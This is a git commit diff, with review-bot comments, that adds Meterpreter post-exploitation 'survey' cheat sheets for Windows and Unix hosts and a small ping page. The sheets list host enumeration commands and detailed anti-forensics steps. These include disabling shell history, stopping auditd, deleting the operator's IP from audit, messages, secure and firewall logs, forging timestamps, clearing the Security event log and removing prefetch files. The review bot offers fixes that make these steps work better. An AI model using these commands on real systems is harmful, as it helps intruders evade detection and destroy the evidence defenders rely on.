Commit aebe285
Changed files (6)
msf/meta/index.md
@@ -5,4 +5,4 @@ title: "Metasploit Meta"
---
-* [survey]({{< relref "msf/meta/survey.md" >}})
+* [windows survey]({{< relref "msf/survey/windows.md" >}})
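Review bot: the index gains a link for the Windows survey but not for msf/survey/unix.md, which this same commit adds, so the new Unix page is unreachable from the Meta index; add a second bullet alongside it, for example `* [unix survey]({{< relref "msf/survey/unix.md" >}})`.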
msf/meta/survey.md
@@ -1,87 +0,0 @@
----
-date: "2017-02-15"
-draft: false
-title: "Meterpreter Survey - Windows"
-
----
-
-
-# Init
-0. **Situational Awareness**
-
- * `getuid` *`# Get the meterpreter current User Id`*
- * `getpid` *`# Get the meterpreter current PID`*
- * `ipconfig` *`# Host Name, IP Address`*
- * `sysinfo` *`# Get the hostname, OS, and architecture of the system`*
- * `ps` *`# Get a list of the currently running processes and check current meterpreter process PID`*
- * `netstat` *`# Get a list of the current connections and listening ports`*
- * `cd c:\\windows\\temp\\` *`# Change directory to have predictable File System interactions`*
- * `pwd`
- * `ls`
-
-0. **System Date/Time**
-
- * `run wmic -c "timezone list brief"` *`# Get the current time zone`*
- * `run wmic -c "os get localdatetime"` *`# Get the current time`*
-
-0. **Security and Settings**
- * `run get_env` *`# Show system environment variables`*
- * `run getcountermeasure` *`# Determine if firewall is enabled`*
- * `run multicommand -cl "at","schtasks /query"` *`# List scheduled tasks`*
- * `run wmic -c "startup list"` *`# Get a list of the applications that are set to launch at startup`*
- * `run multicommand -cl "netsh firewall show logging"` *`# Determine if the built-in firewall has logging enabled or disabled`*
- * `run event_manager -i` *`# Show which Windows event logs are available`*
-
-# Users and Domains
-
-0. **Users**
-run wmic -c "netlogin get name,lastlogon,badpasswordcount"
- Password Settings
-
-# Software
-
-0. **Enumerate Persistance Vectors**
-
- * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
- * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
- * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
- * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
- * `reg queryval - k "HKLM\\software\\microsoft\\windows\\currentversion\\winlogon" -v "shell"`
-
-0. **Windows firewall log cleaning**
-
- * `run multicommand -cl "findstr \"<IP ADDRESS>\" c:\\windows\\pfirewall.log"`
- * `run multicommand -cl "cmd /c findstr /v \"<IP ADDRESS>\" c:\\windows\\pfirewall.log > c:\\temp\\pfirewall.log"`
- * `timestomp pfirewall.log -z "MM/DD/YYYY HH:mm:ss"`
-
-0. Defender / Security Essentials
-
-reg queryval -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet" -v spynetreporting
-
-0. Dr. Watson
-
-# Networking
-
-reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyEnable
-reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyServer
-
-0. Local Area Networks
-
-run netenum -ps -r 172.17.20.200-172.17.20.230 Pingsweeep of network range
- run multicommand -cl "ping -n 2 <Target 2 IP>"
-
-
-# Doucments and File System interactions
-search -r -d C:\\Users\\ -f *.doc Using Meterpreter's built-in functionality, determine whether any files with a .doc extension are present on the system. Limit your search to just the user's directories.
- Using Meterpreter's built-in functionality, search for any .log files related to Windows Defender.
-search -d "C:\\ProgamData\\Microsoft\\Windows Defender\\" -f *.log -r
- Download to your /tmp directory the logs from the Windows Defender\Scans\History\Service subdirectory.
-download -r "C:\\ProgamData\\Microsoft\\Windows Defender\\scans\\history\\service\\" "/tmp/"
- Using Meterpreter's built-in functionality, get a list of the registry values under the System run key.
-run multicommand -cl "cmd /c dir /o:d /t:w" Change to the prefetch directory and get a list of directory contents, sorted oldest to newest by write time.
- remove prefetch files that you created (post exploit)
-
-
-# Cleanup
-
-Prefetch Directory
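Review bot: this removal and the new msf/survey/windows.md are a move-and-extend of the same page (the Init, Software and Networking sections reappear nearly verbatim), so staging it as a rename (`git mv` before editing, or generating the diff with rename detection) would keep the file's history attached instead of splitting it into an 87-line deletion and a 187-line addition. The only content that does not carry over is the bare `Password Settings` line under Users, which had no command attached to it.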
msf/survey/unix.md
@@ -0,0 +1,111 @@
+---
+date: "2017-02-21"
+draft: false
+title: "Meterpreter Survey - Unix"
+
+---
+# Init
+
+0. **Situational Awareness**
+
+ * `unset HISTFILE`
+ * `su root` *`# if needed`*
+ * `unset HISTFILE`
+ * `date`
+ * `date +%s`
+ * `find /var/log -type f -mmin -10 2> /dev/null`
+ * `ls -lart /var/log`
+ * `cat /etc/*syslog*.conf | grep -v "^#"`
+ * `service auditd status`
+ * `/sbin/chkconfig --list`
+ * `service --status-all`
+ * `ps -aef`
+ * `uname -a`
+ * `cat /etc/*release`
+ * `cat /etc/inittab`
+ * `w`
+ * `who -a`
+ * `last -a -i`
+ * `lastlog`
+ * `lastb`
+ * `uptime`
+ * `cat ~/.bash_history`
+ * `/sbin/lsmod`
+ * `vmstat`
+ * `cat /proc/cpuinfo`
+ * `hostname`
+ * `/sbin/iptables -nL --line-numbers`
+ * `cat /etc/resolv.conf`
+ * `/sbin/ifconfig -a`
+ * `netstat -antup`
+ * `ps -aef`
+
+0. **Crontabs**
+
+ * `for user in $(cut -f1 -d: /etc/passwd); do echo $user >> /tmp/crontabs; crontab -u $user -l >> /tmp/crontabs; done`
+ * `cat /tmp/crontabs | more`
+ * `rm -f /tmp/crontabs`
+ * `ls -la /etc/cron*`
+ * `cat /etc/crontab`
+
+0. **Suspicious files**
+
+ * `find / -type f -name ".*"` *`# find hidden files`*
+ * `find / -type d -name ".*"` *`# find hidden directories`*
+ * `find / -user root –perm -4000 –print0 | xargs -0 ls -l` *`# find SUID root executables`*
+ * `find / -perm -2000 –print0 | xargs -0 ls -l` *`# search SGID programs`*
+
+# Cleaning Logs
+
+0. **Cleaning audit log**
+
+ * `grep -n "<IP ADDR>" /var/log/audit/audit.log`
+ * `service auditd stop`
+ * `wc -l /var/log/audit/audit.log`
+ * `head -n <X>/var/log/audit/audit.log > /tmp/aud.log` *`# <X> = line number before your entries start`*
+ * `wc -l /tmp/aud.log` *`# should be X lines`*
+ * `tail /tmp/aud.log`
+ * `date -d @epoch time of last entry`
+ * `cat /tmp/aud.log > /var/log/audit/audit.log`
+ * `chmod 0600 /var/log/audit/audit.log`
+ * `touch -t YYYYMMDDHHmm.ss /var/log/audit/audit.log`
+ * `ls -al /var/log/audit/audit.log`
+ * `rm -f /tmp/aud.log`
+
+0. **Cleaning Messages log**
+
+ * `grep -n "<IP ADDR>" /var/log/messages`
+ * `wc -l /var/log/messages`
+ * `head -n X /var/log/messages > /tmp/msg.log` *`# where X is the line number before your entries start`*
+ * `wc -l /tmp/msg.log` *`# should be X lines`*
+ * `tail /tmp/msg.log`
+ * `cat /tmp/msg.log > /var/log/messages`
+ * `chmod 0600 /var/log/messages`
+ * `touch -t YYYYMMDDHHmm.ss /var/log/messages`
+ * `ls -al /var/log/messages`
+ * `rm -f /tmp/msg.log`
+
+0. **Cleaning /var/log/secure**
+
+ * `grep "sshd\[<PID>\]" /var/log/secure`
+ * `grep -v "sshd\[<PID>\]" /var/log/secure > /tmp/secure.log`
+ * `tail /tmp/secure.log`
+ * `cat /tmp/secure.log > /var/log/secure`
+ * `tail -3 /var/log/secure`
+ * `touch -t YYYYMMDDHHmm.ss /var/log/secure`
+ * `rm -rf /tmp/secure.log`
+
+# Cleanup
+
+0. **Delete any tmp files you created**
+
+ * `ls -l /tmp`
+ * `rm -f /tmp/*.log`
+
+0. **Restart auditd after you logout**
+
+ * `echo -e '#!/bin/sh\nsleep 30\nfunction d {\nservice auditd start && rm -rf /tmp/X-unix\n}\ntrap d EXIT' > X-unix`
+ * `chmod 755 X-unix`
+ * `cat X-unix`
+ * `./X-unix&`
+
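Review bot: the two `find` lines under Suspicious files use an en-dash instead of a hyphen (`find / -user root –perm -4000 –print0 | xargs -0 ls -l` and the `-perm -2000` line below it), so `find` will treat `–perm` as a path and exit with an error; replace them with `-perm` and `-print0`. Formatting nits in the same hunk: `head -n <X>/var/log/audit/audit.log` is missing the space before the path; `date -d @epoch time of last entry` mixes the command with a prose placeholder and should read `date -d @<EPOCH>` with the explanation as a trailing comment like the neighbouring lines; `rm -rf /tmp/secure.log` targets a single file, so `-f` alone matches the other cleanup lines; `cat /tmp/crontabs | more` can simply be `more /tmp/crontabs`; and `ps -aef` appears twice in the Situational Awareness list.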
msf/survey/windows.md
@@ -0,0 +1,187 @@
+---
+date: "2017-02-21"
+draft: false
+title: "Meterpreter Survey - Windows"
+
+---
+
+
+# Init
+0. **Situational Awareness**
+
+ * `getuid` *`# Get the meterpreter current User Id`*
+ * `getpid` *`# Get the meterpreter current PID`*
+ * `ipconfig` *`# Host Name, IP Address`*
+ * `sysinfo` *`# Get the hostname, OS, and architecture of the system`*
+ * `ps` *`# Get a list of the currently running processes and check current meterpreter process PID`*
+ * `netstat` *`# Get a list of the current connections and listening ports`*
+ * `cd c:\\windows\\temp\\` *`# Change directory to have predictable File System interactions`*
+ * `idletime`
+ * `pwd`
+ * `ls`
+
+0. **System Date/Time**
+
+ * `run wmic -c "timezone list brief"` *`# Get the current time zone`*
+ * `run wmic -c "os get localdatetime"` *`# Get the current time`*
+
+0. **Security and Settings**
+ * `run get_env` *`# Show system environment variables`*
+ * `run getcountermeasure` *`# Determine if firewall is enabled`*
+ * `run multicommand -cl "at","schtasks /query"` *`# List scheduled tasks`*
+ * `run wmic -c "startup list"` *`# Get a list of the applications that are set to launch at startup`*
+ * `run multicommand -cl "netsh firewall show logging"` *`# Determine if the built-in firewall has logging enabled or disabled`*
+ * `run event_manager -i` *`# Show which Windows event logs are available`*
+ * `reg enumkey -k "HKLM\\Security\\Policy\\PolAdtEv"`
+ * `run uploadexec -e /<PATH_TP>/auditpol.exe -r -v`
+
+# Domains and Users
+
+0. **Domains**
+ * `reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion" -v productname`
+ * `reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion" -v currentversion`
+ * `reg queryval -k "HKLM\\system\\currentcontrolset\\services\\tcpip\\parameters" -v "Domain"`
+ * `run wmic -c "computersystem get domain"`
+
+0. **Users**
+ * `run enum_logged_on_users -c`
+ * `run wmic -c "netlogin get name,lastlogon,badpasswordcount"`
+
+
+# Software
+
+0. **Installed Software**
+
+ * `run get_application_list`
+
+0. **Enumerate Persistance Vectors**
+ * `run wmic -c "startup list"`
+ * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
+ * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
+ * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
+ * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
+ * `reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" -v "shell"` *`# xp`*
+ * `reg queryval -k "HKLM\\software\\microsoft\\windows\\currentversion\\winlogon" -v "shell"`
+
+
+0. **Defender / Security Essentials**
+
+ * `migrate <PID>` *`# Migrage to SYSTEM svchost, required for viewing/editing spynet registry`*
+ * `reg enumkey -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet"`
+ * `reg enumkey -k "HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions"`
+ * `reg queryval -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet" -v spynetreporting` *`# 0=no, 1=basic, 2=advanced`*
+ * `ls "C:/programdata/microsoft/microsoft antimalware/quarantine/entries"` *`# quarantined files`*
+ * `run event_manager -l SYSTEM -f 1001` *`# last scheduled job`*
+ * `cat "c:/windows/temp/MpSigStub.log"`
+ * `cat "c:/windows/temp/MpCmdRun.log"`
+
+0. **Remote Logging**
+
+ * `run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (RPC)\""`
+ * `run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (NP-In)\""`
+ * `run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (RPC-EPMAP)\""`
+ * `run multicommand -cl "netsh advfirewall firewall show rule name=\"Windows Remote Management (HTTP-In)\""`
+
+0. Dr. Watson
+
+# Networking
+
+0. **Local Area Networking**
+
+ * `run multicommand -cl "ipconfig /all"`
+ * `run multicommand -cl "ipconfig /displaydns"`
+ * `netstat`
+
+0. **Network awareness**
+
+ * `run netenum -ps -r <IPSTART>-<IPEND>` *`# Pingsweeep of network range`*
+ * `run multicommand -cl "ping -n 2 <IP>"`
+
+0. **Internet Settings**
+
+ * `reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyEnable`
+ * `reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyServer`
+
+# Doucments and File System interactions
+
+0. **Finding Files**
+
+ * `search -f *.<EXT>` *`# find all files of type <EXT>`*
+ * `search -d "C:\\<PATH>\\<DIR>\\" -f *.<EXT> -r"` *`# search a specific <DIR>`*
+ * `run multicommand -cl "cmd /c dir c:\\*.<EXT> /S /A"`
+ * `download <FILE>` *`# download for offline analysis (e.g. strings)`*
+
+# Malware
+
+0. **Enumerate processes and handles**
+
+ * `ps`
+ * `netstat`
+ * `search -f <PROCESS>.exe`
+ * `run multicommand -cl "tasklist /FI \"PID eq <PID>\" /M"`
+ * `upload /<PATH> handle.exe`
+ * `run multicommand -cl "cmd /c handle -p "<PROCESS>.exe" -accepteula"`
+ * `rm C:\\<PATH>\\handle.exe`
+ * `ls`
+
+0. **Related files**
+
+ * `run multicommand -cl "cmd /c dir c:\\windows\\system32\\malicious.file"`
+ * `run multicommand -cl "cmd /c dir c:\\ /S /A | findstr \"MM/DD/YYYY HH:MM\""` *`# related files by date`*
+ * `run multicommand -cl "cmd /c dir c:\\windows\\system32\\drivers /o:d /t:w"` *`# recent drivers`*
+
+0. **Strings and Memory**
+
+ * `download <FILE>` *`# download for offline analysis (e.g. strings)`*
+ * `run process_memdump -p PID`
+
+# Cleanup
+
+0. **Event Log**
+
+ * `run event_manager -i`
+ * `run event_manager -l security -f 529` *`# ms08_067`*
+ * `run event_manager -l security -f 680` *`# ms08_067`*
+ * `run event_manager -l system -f 1116` *`# bccaa_bof`*
+ * `run event_manager -l system -f 1117` *`# bcaaa_bof`*
+ * `run event_manager -c security`
+ * `run event_manager -l security` *`# expect 517 for cleared log`*
+
+0. **Logs and Dump files**
+
+ * `run multicommand -cl "cmd /c dir c:\\*.*log /S /A"`
+ * `run multicommand -cl "cmd /c dir c:\\*.*dmp /S /A"`
+ * `search -f *.*dmp`
+ * `ls "c:\\documents and settings\\all users\\application data\\microsoft\\dr watson"`
+
+0. **WER**
+
+ * `ls "c:\\ProgramData\\microsoft\\windows\\wer\\reportarchive"`
+ * `ls "c:\\ProgramData\\microsoft\\windows\\wer\\reportqueue"`
+ * `ls "c:\\ProgramData\\Microsoft\\Windows\\wer\\"`
+
+0. **Windows firewall log cleaning**
+
+ * `run multicommand -cl "netsh advfirewall show currentprofile"`
+ * `run multicommand -cl "netsh advfirewall show allprofiles"`
+ * `run multicommand -cl "netsh advfirewall export \"c:/windows/temp/firewall.wfw\""`
+ * `ls "c:/windows/system32/logfiles/firewall"`
+ * `run multicommand -cl "findstr \"<IP ADDR>\" c:\\windows\\system32\\firewall\\pfirewall.log"`
+ * `cd c:/windows/temp`
+ * `run multicommand -cl "cmd /c findstr /V \"<IP ADDR>\" c:\\windows\\system32\\firewall\\pfirewall.log > c:\\windows\\temp\\fw.tmp"`
+ * `run multicommand -cl "findstr \"<IP ADDR>\" c:\\windows\\temp\\fw.tmp"`
+ * `cat fw.tmp`
+ * `ps`
+ * `run multicommand -cl "netsh advfirewall set currentprofile state off"`
+ * `run multicommand -cl "cmd /c move c:\\windows\\temp\\fw.tmp c:\\windows\\system32\\firewall\\pfirewall.log"`
+ * `timestomp c:\\windows\\system32\\firewall\\pfirewall.log -m "MM/DD/YYYY HH:MM:SS" `
+ * `ls c:\\windows\\system32\\firewall\\pfirewall.log`
+ * `run multicommand -cl "netsh advfirewall import \"c:/windows/temp/firewall.wfw\""`
+ * `run multicommand -cl "netsh advfirewall set currentprofile state on"`
+ * `ls c:\\windows\\system32\\firewall\\pfirewall.log`
+
+0. **Prefetch Cleaning**
+
+ * `cd c:\\windows\\prefetch`
+ * `run multicommand -cl "cmd /c dir /o:d /t:w"`
+ * `rm <FILE>.pf`
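Review bot: the Enumerate Persistance Vectors list repeats itself: the `HKLM\\...\\currentversion\\run` and `HKCU\\...\\currentversion\\runonce` lines each appear twice, and `run wmic -c "startup list"` already appears under Security and Settings; drop the duplicates and correct the heading to "Persistence". Other items in this hunk: `/<PATH_TP>/auditpol.exe` looks like a typo for `<PATH_TO>`; `search -d "C:\\<PATH>\\<DIR>\\" -f *.<EXT> -r"` has a stray closing quote after `-r`; `run process_memdump -p PID` should use the `<PID>` placeholder form used everywhere else; the comments `bccaa_bof` and `bcaaa_bof` on events 1116 and 1117 disagree with each other; `Migrage`, `Pingsweeep` and `Doucments` are typos; and `0. Dr. Watson` is the only item without bold and without a command, so either give it content (its data directory is already listed under Logs and Dump files) or remove it. In the firewall section the directory listing uses `c:/windows/system32/logfiles/firewall` while the findstr, move and timestomp lines use `c:\\windows\\system32\\firewall\\pfirewall.log`; the two paths should agree. Finally, the comment on the last Event Log line expects 517 for a cleared log; that is the pre-Vista ID, and Vista and later write event 1102 to the Security log instead, which is the event defenders alert on, so the comment should name both.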
unix/commands/ping.md
@@ -0,0 +1,42 @@
+---
+date: "2017-03-07"
+draft: false
+title: "ping"
+tag: ["cli", "commands"]
+category: "unix"
+
+---
+## Summary - `ping`
+
+| OS | Default Available | Online Man |
+|---------|-------------------|------------|
+| Linux | Y | |
+| Solaris | Y | |
+| BSD | Y | |
+| MacOS | Y | |
+
+
+| Basics | Command |
+|------------|------------|
+| Version | `ping -V` |
+| Usage info | `ping -h` |
+| Man | `man ping` |
+
+
+## Usage - `ping`
+
+send ICMP ECHO_REQUEST to network hosts
+
+### Examples
+| ping | OS | description |
+|-------------------------|------|---------------------------------------|
+| `ping 192.168.1.1` | Unix | send ICMP ECHO_REQUEST to 192.168.1.1 |
+| `ping -c 1 192.168.1.1` | Unix | only send 1 ping |
+
+#### Ping sweep a subnet
+```
+for i in `seq 1 255`; do (ping -c 1 10.11.1.$i | tr \\n ' ' | awk '/1 received/ {print $2}' &); done
+```
+
+
+
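Review bot: the ping sweep fence has no language tag; mark it as ```bash so it renders consistently, and consider `$(seq 1 255)` in place of the backtick form, which is easy to confuse with the page's inline code. The Basics table lists `ping -V`, which is an iputils (Linux) option that BSD and macOS ping do not have, so the `Unix` label in the OS column overstates its portability; the `Online Man` column is empty in every row and should be filled or dropped; and the file ends with three trailing blank lines.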
unix/commands/pmap.md
@@ -1,6 +0,0 @@
----
-date: "2016-12-20"
-draft: false
-title: ""
-
----